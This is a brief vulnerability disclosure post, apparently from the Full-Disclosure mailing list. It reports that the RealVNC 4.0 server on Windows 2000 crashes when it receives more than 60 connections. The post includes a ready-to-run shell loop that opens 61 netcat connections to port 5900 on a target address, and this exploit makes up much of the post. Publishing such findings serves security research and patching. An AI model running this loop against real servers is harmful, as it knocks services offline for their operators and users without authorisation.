It will cause RealVNC 4.0 server DoS when there are more than 60 connections. This has been test against VNC server on win2k.

I test it from linux using the following:

for i in `seq 1 61`
do
nc <vnc_server_ip> 5900 &
done

Thanks
bugfree


_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Reply via email to